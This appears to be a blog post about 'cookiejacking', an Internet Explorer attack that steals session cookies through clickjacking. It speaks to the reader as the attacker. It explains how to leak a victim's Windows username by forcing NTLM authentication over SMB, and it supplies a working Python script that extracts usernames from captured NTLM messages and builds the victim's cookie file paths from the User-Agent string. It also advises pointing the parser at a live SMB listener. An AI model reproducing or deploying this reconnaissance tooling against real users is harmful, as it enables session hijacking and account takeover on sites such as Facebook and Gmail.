You know about clickjacking, the UI redressing trick widely used against Facebook users to hijack their clicks. Cookiejacking is a slightly different concept. Cookiejacking is a UI redressing attack that allows an attacker to hijack his victim's cookies without any XSS. It works on
- Any cookie.
- Any website.
Once a hacker has that cookie, he or she can replay it to access the same site as the victim; the session cookie is what the site uses to recognise a logged-in user, so no password is needed. So we can say that Facebook, Twitter, Gmail and many more websites are at risk.
A computer security researcher has found a flaw in Microsoft Corp's widely used Internet Explorer browser that he said could let hackers steal credentials to access Facebook, Twitter and other websites.
Cookiejacking leverages two main issues to perform the attack:
- a 0-day vulnerability (unpatched at the time of disclosure) affecting every IE version on every Windows OS
- an advanced Clickjacking approach.
It sounds difficult, but Valotta, the researcher, said he was able to do it fairly easily. He built a puzzle in which users are challenged to "undress" a photo of an attractive woman. He published this game on Facebook, and in less than three days more than 80 cookies were sent to his server.
But you need to know some facts before performing this attack. First of all, the path of the cookie file on the file system depends on the Windows username, so you need to learn your victim's username before starting the attack.
You can sniff your victim's username by exploiting a feature of IE: IE can access remote SMB resources referenced by UNC paths, and it does so without restriction in the Internet and Intranet zones.
So, if you force your victim's browser to retrieve a resource over a UNC path, it will start an NTLM challenge-response negotiation with the remote server and, as part of this negotiation, it sends the Windows username in clear text. The password itself is never transmitted (only a response to the server's challenge is), but the username, domain and workstation fields of the NTLM authenticate message are unencrypted.
So you can just use a script that captures the data on TCP port 445 to grab the username. One caveat: the authenticate message that carries the username is only sent after the server answers the client's first message with a challenge, so the attacker's host must actually run (or emulate) an SMB server, not merely sniff the wire. You also need to know which OS version the victim is running, as different OSs store cookies in different folders. You can guess this by parsing the navigator.userAgent string: IE reports the kernel version there ("Windows NT 5.1" is XP, "Windows NT 6.1" is Windows 7).
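Here is the whole reconnaissance step in code, as an added example (this is not Valotta's code, nor anything from the original post). It builds a constructed NTLM Type 3 (AUTHENTICATE) message in place of a real capture, pulls the username out of it the way a script listening on port 445 would, and then maps the victim's navigator.userAgent value to the IE cookie folders for that user. The field layout follows the MS-NLMP AUTHENTICATE_MESSAGE structure; the cookie folder locations are the IE defaults for XP and Vista/7, and the file name pattern `<user>@<site>[1].txt` is IE's cookie-store convention (the bracketed index climbs as cookies are re-issued, so `[1]` is only the first candidate).

```python
"""Recover a victim's Windows username from a sniffed NTLM Type 3 message and
derive the IE cookie file locations for it.  Added example; the NTLM message
and User-Agent strings used below are constructed here, not captured."""
import re
import struct

NTLMSSP_SIGNATURE = b"NTLMSSP\x00"
NTLMSSP_NEGOTIATE_UNICODE = 0x00000001  # strings are UTF-16LE when set


def parse_ntlm_type3(msg):
    """Return domain, user and workstation from an NTLM AUTHENTICATE message.

    After the 8-byte signature and 4-byte message type come six
    (Len, MaxLen, Offset) descriptors: LM response, NT response, domain,
    user, workstation, session key.  Offsets are relative to message start.
    """
    if not msg.startswith(NTLMSSP_SIGNATURE):
        raise ValueError("not an NTLMSSP message")
    (msg_type,) = struct.unpack_from("<I", msg, 8)
    if msg_type != 3:
        raise ValueError("expected AUTHENTICATE (type 3), got type %d" % msg_type)
    fields = [struct.unpack_from("<HHI", msg, 12 + 8 * i) for i in range(6)]
    (flags,) = struct.unpack_from("<I", msg, 60)
    encoding = "utf-16-le" if flags & NTLMSSP_NEGOTIATE_UNICODE else "cp437"

    def field(index):
        length, _maxlen, offset = fields[index]
        if offset + length > len(msg):
            raise ValueError("field runs past end of message")
        return msg[offset:offset + length].decode(encoding)

    return {"domain": field(2), "user": field(3), "workstation": field(4)}


def extract_type3_from_stream(data):
    """Scan a captured TCP/445 payload for an embedded Type 3 message.

    The SMB/GSS-API wrapping varies between Windows versions, so instead of
    parsing SMB we look for the NTLMSSP signature and parse from there."""
    pos = data.find(NTLMSSP_SIGNATURE)
    while pos != -1:
        if len(data) >= pos + 12 and struct.unpack_from("<I", data, pos + 8)[0] == 3:
            return parse_ntlm_type3(data[pos:])
        pos = data.find(NTLMSSP_SIGNATURE, pos + 1)
    return None


def build_ntlm_type3(domain, user, workstation):
    """Constructed test fixture: a minimal Type 3 message.

    The LM/NT responses are zero-filled stand-ins; the point is that the
    identity strings travel next to them with no encryption at all."""
    items = [b"\x00" * 24, b"\x00" * 24,
             domain.encode("utf-16-le"), user.encode("utf-16-le"),
             workstation.encode("utf-16-le"), b""]
    descriptors, offset = b"", 64  # payload starts right after the flags
    for item in items:
        descriptors += struct.pack("<HHI", len(item), len(item), offset)
        offset += len(item)
    return (NTLMSSP_SIGNATURE + struct.pack("<I", 3) + descriptors
            + struct.pack("<I", NTLMSSP_NEGOTIATE_UNICODE) + b"".join(items))


def ie_cookie_dirs(user_agent, username):
    """Map the IE User-Agent's 'Windows NT x.y' token to the cookie folders.

    5.1/5.2 are XP/2003; 6.0+ (Vista, 7) keep cookies under the roaming
    profile, and Protected Mode IE writes to the 'Low' subfolder, so both
    are returned for those versions."""
    m = re.search(r"Windows NT (\d+)\.(\d+)", user_agent)
    if not m:
        raise ValueError("no Windows NT version in User-Agent")
    version = (int(m.group(1)), int(m.group(2)))
    if version <= (5, 2):
        return [r"C:\Documents and Settings\%s\Cookies" % username]
    base = r"C:\Users\%s\AppData\Roaming\Microsoft\Windows\Cookies" % username
    return [base, base + r"\Low"]


def ie_cookie_paths(user_agent, username, site_label):
    """Candidate cookie files, e.g. ...\Cookies\rosario@facebook[1].txt."""
    return [r"%s\%s@%s[1].txt" % (d, username, site_label)
            for d in ie_cookie_dirs(user_agent, username)]


if __name__ == "__main__":
    # Constructed capture: SMB bytes before the NTLMSSP blob, then a Type 3.
    capture = b"\xfeSMB" + b"\x00" * 12 + build_ntlm_type3("WORKGROUP", "rosario", "VICTIM-PC")
    identity = extract_type3_from_stream(capture)
    ua = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"  # constructed
    for path in ie_cookie_paths(ua, identity["user"], "facebook"):
        print(path)
```

Run it as a script and it prints the two Windows 7 candidate paths for the constructed user; swap the User-Agent for a "Windows NT 5.1" one and you get the single XP path. The parser is the part worth keeping: point it at the bytes your SMB listener receives after it has answered the victim's Type 1 with a challenge.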
See demo video
Would love to hear from you...